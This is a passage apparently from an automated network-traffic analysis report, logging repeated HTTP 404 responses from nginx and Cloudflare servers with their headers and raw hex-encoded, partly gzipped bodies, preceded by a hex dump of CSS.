09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:49:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:49:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:49:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:49:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:50:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:50:07 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:50:10 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 03 Dec 2024 08:50:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:50:18 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Blkhi8mNMCu0upY65H7YkYIyP7pz6fCAfqBIDNZFEmT5%2BW0p%2FqayhfLsfmKHgtEuLe%2B%2F4ceF6LyYkcCPjZMZu%2BHe%2FfezwDCy%2FiGwg7UTQf0cu1lMpNPqeYmYQL0qi8Sn1gjcayRQHdDamXFp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24ef1e841435b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102753&min_rtt=102753&rtt_var=51376&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=699&delivery_rate=0&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:50:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4Jm0F7rUfa3rxyaInr%2FVqOs4oRFf83n3CI82HRh3vFiigq3GViiLo39DwUDxdLkebkug82WlbrNg4hPaRO4q9p7Yc6HtnonJrGHY0JVcsownoCXz%2B2g2bT%2FLTVaM9JAmuSUUc%2FY2wfyhAYMB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24f025e02428b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103143&min_rtt=103143&rtt_var=51571&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 Data Ascii: 33fnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-Su]B
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:50:23 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=COA1jnOlJHoKY0IsqSaVq9wN8yz4YrIVbnA7obau7NGWZG4WPSStbn%2B%2Bm%2BEVCAAZSYyzqVaiWSWPr1WhyniEpybsSAUsqtY8IepM2tNSwn31M7xKQSrMUtcCx54tHd8fn8HpGxn52UVc08jG"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24f12dbd38c96-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=103358&min_rtt=103358&rtt_var=51679&sent=2&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3836&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 33 34 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 96 cd 6e db 46 10 c7 ef 01 f2 0e e3 3d 7b 45 91 b2 be 0a 92 40 eb b8 49 2f 4d d0 26 40 7b 2a 56 cb 11 b9 28 b9 43 ef 2c 29 ba 6f 63 f4 10 a0 40 9f 42 2f 56 50 51 24 51 71 5a b8 f6 89 3b dc 99 df cc 1f c3 dd 61 7c f1 ea ed f5 fb 5f df dd 40 e1 ab 32 7d f9 22 ee 9f 50 2a 9b 27 a2 f6 f2 bb 9f 44 fa f2 05 40 5c a0 ca 76 2b 80 b8 42 af 40 17 ca 31 fa 44 7c 78 ff bd 5c 88 c1 5e e1 7d 2d f1 b6 31 6d 22 7e 91 1f be 95 d7 54 d5 ca 9b 55 89 02 34 59 8f d6 27 e2 87 9b 04 b3 1c 87 a1 56 55 98 88 d6 e0 a6 26 e7 4f bc 37 26 f3 45 92 61 6b 34 ca 9d 71 09 c6 1a 6f 54 29 59 ab 12 93 f0 21 d2 9a 5c a5 bc cc d0 a3 f6 86 ec 09 d1 63 89 75 41 16 13 4b 0f 85 3a 5a 91 e7 93 00 4b c6 66 d8 1d 7c bd f1 25 a6 6f 88 6b cc 54 8e 15 64 08 3f 1b 8f a0 a9 82 57 54 6d ff b6 86 e0 b5 db de 7b c3 20 e1 0d b1 7f ad 3c b9 38 f8 14 ba e7 94 c6 fe 0e 0e cb 44 70 41 ce eb c6 83 d1 7d a9 85 c3 75 22 02 9d 1b c9 77 1c 98 4a e5 c8 c1 5a b5 fd f6 61 31 32 fa 58 ff 91 f5 18 84 9c 44 a3 da e6 02 d8 fc 81 9c 88 49 d4 4d a2 a7 32 a7 f3 01 73 3a ef a6 f3 a7 32 e7 b3 01 73 3e eb e6 b3 a7 32 97 43 e6 72 d6 2d 9f cc 0c a3 c5 00 1a 46 8b 2e 8c 16 e2 99 5a 2e c3 e5 b0 61 e1 32 ea c2 e5 43 2d 53 75 5d a2 f4 d4 e8 42 3e Data Ascii: 34bnF={E@I/M&@{*V(C,)oc@B/VPQ$QqZ;a|_@2}"P*'D@\v+B@1D|x\^}-1m"~TU4Y'VU&O7&Eak4qoT)Y!\cuAK:ZKf|%okTd?WTm{ <8DpA}u"wJZa12XDIM2s:2s>2Cr-F.Z.a2C-Su]B>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 08:50:26 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeLast-Modified: Thu, 29 Sep 2022 21:53:06 GMTVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLUtjnz8ih8PmGHdtbMaO7CNyTIuuGXKjzV10YMiUFrzvh9EFEJhKv8XGmAVpo64Zwp30TOEMI4vMis62l%2FktEG%2BsrS6XLSI4%2Bj0i11jY94durH3J%2Fhj20K%2FtnG%2Bz%2B4L6aLlSFbDX%2FLBY37y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ec24f235b3fde94-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=102781&min_rtt=102781&rtt_var=51390&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=422&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 33 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 74 2d 42 52 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 48 6f 73 70 65 64 61 67 65 6d 20 64 65 20 53 69 74 65 20 63 